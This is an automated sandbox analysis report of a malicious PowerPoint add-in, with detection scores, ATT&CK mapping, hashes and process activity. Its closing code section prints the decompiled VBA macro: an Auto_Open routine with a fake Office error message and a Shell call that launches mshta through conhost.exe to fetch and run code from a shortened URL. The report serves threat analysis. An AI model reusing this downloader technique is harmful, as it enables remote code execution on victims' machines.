Windows Analysis Report PO04012022.ppam
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Malware Configuration: | No configs have been found |
Yara Overview: | No yara matches |
Sigma Overview: | No Sigma rule has matched |
Jbx Signature Overview |
AV Detection: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | ReversingLabs: |
Machine Learning detection for sample |
Source: | Joe Sandbox ML: |
Source: | File opened: |
Software Vulnerabilities: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | String found in binary or memory: |
System Summary: |
Document contains an embedded VBA macro with suspicious strings |
Source: | OLE, VBA macro: | Name: lol |
Source: | OLE, VBA macro: | Name: Auto_Open |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | File created: |
Source: | Classification label: |
Source: | Process created: |
Source: | File read: |
Source: | File created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Source: | Process created: |
Source: | Queries volume information: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection11 | LSASS Memory | System Information Discovery11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Detection | Scanner | Label |
---|---|---|
13% | Virustotal | |
28% | ReversingLabs | Document-Word.Trojan.Heuristic |
100% | Joe Sandbox ML | |
No Antivirus matches |
Detection | Scanner | Label |
---|---|---|
0% | Virustotal | |
0% | Avira URL Cloud | safe |
No contacted domains info |
Malicious | Antivirus Detection | Reputation |
---|---|---|
false | | unknown |
false | | low |
true | | unknown |
No contacted IP infos |
General Information |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 548357 |
Start date: | 05.01.2022 |
Start time: | 16:06:21 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | PO04012022.ppam |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 2 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal60.expl.winPPAM@7/2@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
No simulations |
No context |
Process: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.48337186543544 |
Encrypted: | false |
SSDEEP: | 24:8dC5k/XT/4IicoLpNe4H5g/Dv3qAQd7Qy:8wk/XTA559N15FAUj |
MD5: | 7C62E662684F8C5BC941E653A458CD4D |
SHA1: | D85A723FEADF29F74DDF94D0B95C14608BF00DA4 |
SHA-256: | C53954AFEA57BB99626DDBC48944789CA85089FED74B955DB37B92FA43F6C32D |
SHA-512: | 1FF75E15C9647C0DEBE25EFD99A9674F30A9E530A26502523F3F132D3AF68F04B1AD7B49A3CECC58CC63D4C750F6B82F0AEBA28915F9BAF782C6AD59C889CEAD |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 72 |
Entropy (8bit): | 4.551277869757234 |
Encrypted: | false |
SSDEEP: | 3:bDuMJltPX+mxW+e+X+v:bCmPu+A |
MD5: | AD7401DED5269BBF01E6F7C41559C1E4 |
SHA1: | 3E06C27F37789359898B4BADFEDF0880B3863214 |
SHA-256: | 53575C137FFBC45488C16115E65BC66F8D57C24A63291699AF729DAE52476C1D |
SHA-512: | 984F85FB39DDC38A0C38E579F21D99694D05C70B857B54DC908DA40D715810C18CBBE798D6D4644025B42E0523156E41F8E39A340282AF5C813E1F398E0E99CE |
Malicious: | false |
Reputation: | low |
Static File Info |
General | |
---|---|
File type: | |
Entropy (8bit): | 7.633099793344531 |
TrID: | |
File name: | PO04012022.ppam |
File size: | 8801 |
MD5: | d58141c856b4831f0c7deb594c4fd25b |
SHA1: | 87ab8351719c70bc5f611d736e32a8a19fce8a2f |
SHA256: | a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505 |
SHA512: | 0b739f25e56fa13d8db7f25e883cbfd0e8d2470adc3c0de45049da8530eec15c4e1627930534bd6356f162f9d7ce2c70c3ea0256805d6eb6ed31f180cda5a1a9 |
SSDEEP: | 192:sz8PvSFUzffz6qQaQzGbjeaS1UujK2ho/Erp/Z2i7H:sz8PvQULzCKKQQMEr1t |
File Content Preview: | PK..........#T^.......U.......[Content_Types].xml...N.0...H.C...dp@......&1..M.6.:Q....I....Ti........r.wb....\....H.U..\.o..{)".U.9.\.1.eq}...=F...s.2....i....GJ....8.C.=.OhP...w.8b$.x.!......X.v.......H.F...;k.SQ.T.>f...A5......K.o..]...7pv........8K... |
File Icon |
Icon Hash: | 9e9ab2eaccdcdcdc |
Network Behavior |
No network behavior found |
Code Manipulations |
Statistics | CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior |
System Behavior |
Start time: | 16:06:19 |
Start date: | 05/01/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faa0000 |
File size: | 2163560 bytes |
MD5 hash: | EBBBEF2CCA67822395E24D6E18A3BDF6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Activities: | File, Section, Registry, Mutex, Process, Thread, Memory, System, Timing, Windows UI, LPC Port |
Start time: | 16:06:21 |
Start date: | 05/01/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4aad0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Activities: | File, Section, Registry, Mutex, Process, Thread, Memory, System, Windows UI, LPC Port |
Start time: | 16:06:22 |
Start date: | 05/01/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fbf0000 |
File size: | 2163560 bytes |
MD5 hash: | EBBBEF2CCA67822395E24D6E18A3BDF6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Activities: | File, Section, Registry, Mutex, Process, Thread, Memory, System, Timing, Windows UI, Object Security, LPC Port |
Start time: | 16:06:26 |
Start date: | 05/01/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff220000 |
File size: | 338432 bytes |
MD5 hash: | CE476F23405AADC46039AC13127DF473 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Activities: | File, Section, Process, Thread, Memory, System, LPC Port |
Disassembly |
Code Analysis |
Module: Class1 |
Declaration |
Line | Content |
---|---|
1 | Attribute VB_Name = "Class1" |
2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = False |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Executed Functions |
APIs | Meta Information |
---|---|
Assert | |
Shell | Shell( |
Strings | Decrypted Strings |
---|---|
"c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd" | |
Line | Instruction | Meta Information |
---|---|---|
9 | Public Function lol() | |
10 | Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd")) | Assert Shell( |
11 | End Function | |
Module: Module11 |
Declaration |
Line | Content |
---|---|
1 | Attribute VB_Name = "Module11" |
Executed Functions |
APIs | Meta Information |
---|---|
Part of subcall function lol@Class1: Assert | |
Part of subcall function lol@Class1: Shell | |
Line | Instruction | Meta Information |
---|---|---|
2 | Sub Auto_Open() | |
3 | Dim obj as New Class1 | executed |
4 | Debug.Print MsgBox("ERROR!Re-Install Office", vbOKCancel); returns; 1 ' BAD ! | |
5 | obj.lol | |
6 | End Sub | |